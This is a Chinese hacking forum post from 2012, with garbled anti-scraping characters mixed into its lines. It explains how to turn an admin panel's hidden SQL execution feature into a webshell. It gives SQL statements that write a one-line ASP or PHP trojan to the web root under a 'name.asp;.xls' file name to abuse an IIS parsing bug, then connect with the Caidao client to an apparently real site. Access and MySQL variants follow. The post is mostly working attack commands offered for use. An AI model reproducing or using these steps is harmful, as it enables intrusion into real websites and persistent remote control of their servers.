好不容易进了后台,发现啥上传啊。备份啊多木有。
# C/ c6 D+ k; C* swebshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
6 z' n! t" L; z2 L5 o+ R$ |6 X+ }文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了," ?- f# K# R |) a5 ^' Y1 J' S
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:- P+ R9 @, @" V, t2 ~8 q) I
1.create table cmd (a varchar(50))
" m6 L0 \" `! C# z0 h6 o, m3 \2.insert into cmd (a) values (‘‘)- D/ t( S% I9 H) [
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd
, W0 ]) p' \8 e K) E- U) K(把表cmd的内容导出为物理路径的一个EXCEL文件)
3 [0 V/ s* ^9 O8 [( g4.drop table cmd
* x: r$ O0 P, j9 L, d6 I利用IIS的BUG成功拿到了WEBSHELL。
* P0 a2 @3 t# e0 b! C) E
3 d: K+ W5 c1 @- g直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! u2 p0 e# u5 i
/ _- R5 l. J# i
SQL语句意思解释:% o! W; S8 f; m9 _% J# G `- t4 A8 W% Q& p
第一句9 b8 Q$ v) L, ^# Z& q, |3 y! x
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为506 F+ Z! y3 ]* f4 s/ G P
# m+ R9 U! @) m. I/ }$ m" n+ R
第二句( C& ]$ U: \8 S7 M
在表cmd的a字段插入一句话木马( B$ |5 h# R: O$ O% |
第三句6 m4 H* d6 p- T0 a, ~6 W+ w4 m
把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件% b& v6 f; R7 B4 m0 u
! ^( s( O: _7 z) h+ B# Z 第四句
) Y9 O; }9 _" u) Y) ^2 I 删除建立的cmd表: k+ ]& u4 H8 ~% F
6 B- u5 s: Z6 G
以下内容为测试:
# ? T+ l: I( R3 w1 E- X Access利用后台SQL执行命令功能导出WebShell:. @$ \$ X3 z" P: C7 b
这个更简单:
( N8 z- Z, S7 W( V/ V: w [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]# |: q& X6 R" M- Z' w# [
或者* g- v# D F$ K
[ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]
9 x# f: X" m P' w) f' D! T1 Z( e+ D& F/ Z9 h! Z; H/ `9 r! Z
后台有执行SQL语句功能(vote为已知表段)
" |% G* [* z; |, O 希望对大家有所帮助拿shell的又一个思路
5 y+ n# y7 l& t1 _. p |
发表于 2012-9-13 17:53:58
收藏
支持
反对